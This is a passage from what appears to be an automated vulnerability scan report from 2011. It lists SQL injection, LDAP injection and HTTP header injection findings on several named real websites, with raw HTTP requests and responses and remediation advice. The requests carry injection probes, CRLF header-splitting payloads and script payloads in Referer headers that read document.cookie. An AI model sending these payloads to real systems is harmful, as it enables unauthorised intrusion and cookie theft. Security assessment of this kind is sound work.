GET /gastroenterology'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /homemodification' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:59:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10049
<html> <head> <title>Unclosed quotation mark before the character string 'homemodification''.<br>Line 1: Incorrect syntax near 'homemodification''.</title> <style> bod ...[SNIP]...
Request 2
GET /homemodification'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:59:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.62. http://www.slackbooks.com/homemodification [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/homemodification
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /homemodification?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:59:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /homemodification?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:59:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12012
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /occupational+therapy' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:01:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10089
<html> <head> <title>Unclosed quotation mark before the character string 'occupational+therapy''.<br>Line 1: Incorrect syntax near 'occupational+therapy''.</title> <style>
...[SNIP]...
Request 2
GET /occupational+therapy'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:01:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12010
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ophthalmic+technology' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:00:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10099
<html> <head> <title>Unclosed quotation mark before the character string 'ophthalmic+technology''.<br>Line 1: Incorrect syntax near 'ophthalmic+technology''.</title> <style>
...[SNIP]...
Request 2
GET /ophthalmic+technology'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:00:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12012
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ophthalmology' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:01:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10019
<html> <head> <title>Unclosed quotation mark before the character string 'ophthalmology''.<br>Line 1: Incorrect syntax near 'ophthalmology''.</title> <style> body {fon ...[SNIP]...
Request 2
GET /ophthalmology'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:01:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /orthopedics' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9999
<html> <head> <title>Unclosed quotation mark before the character string 'orthopedics''.<br>Line 1: Incorrect syntax near 'orthopedics''.</title> <style> body {font-fa ...[SNIP]...
Request 2
GET /orthopedics'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=33dnlq55duskvq55o1bwound; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /pediatrics' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:01:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9989
<html> <head> <title>Unclosed quotation mark before the character string 'pediatrics''.<br>Line 1: Incorrect syntax near 'pediatrics''.</title> <style> body {font-fami ...[SNIP]...
Request 2
GET /pediatrics'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:01:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
2. LDAP injection
There are 3 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads da39f516a098b3de)(sn=* and da39f516a098b3de)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /bmx3/broker.pli?pid=da39f516a098b3de)(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response 1
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_da39f516a098b3de)(sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
/*error*/
Request 2
GET /bmx3/broker.pli?pid=da39f516a098b3de)!(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response 2
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_da39f516a098b3de)!(sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /v/VUCJyeb_3Mo?fs=1&hl=en_US&color1=0x3a3a3a&color2=0x999999 HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/manuals-online?4a4b1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E18871e2d338=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=*)(sn=*; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==
The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.
The payloads 4e65bf9585ccb14d)(sn=* and 4e65bf9585ccb14d)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /v/sj4BVK0o-7w HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=4e65bf9585ccb14d)(sn=*
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 9bf0b%0d%0ad1d5184d06f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9bf0b%0d%0ad1d5184d06f/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9bf0b d1d5184d06f/N553.158901.DATAXU/B4970757.11: Date: Sat, 05 Feb 2011 21:50:27 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 843f5%0d%0acb11c15fe77 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /843f5%0d%0acb11c15fe77/N815.286991.WEBBUYERSGUIDE/B5173264;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/843f5 cb11c15fe77/N815.286991.WEBBUYERSGUIDE/B5173264%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1032c%0d%0a72456777471 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1032c%0d%0a72456777471/N815.zdenterprise/B4597436.59;sz=1x1;ord=1288981822554? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1032c 72456777471/N815.zdenterprise/B4597436.59%3Bsz%3D1x1%3Bord%3D1288981822554: Date: Sun, 06 Feb 2011 13:22:40 GMT Server: GFE/2.0
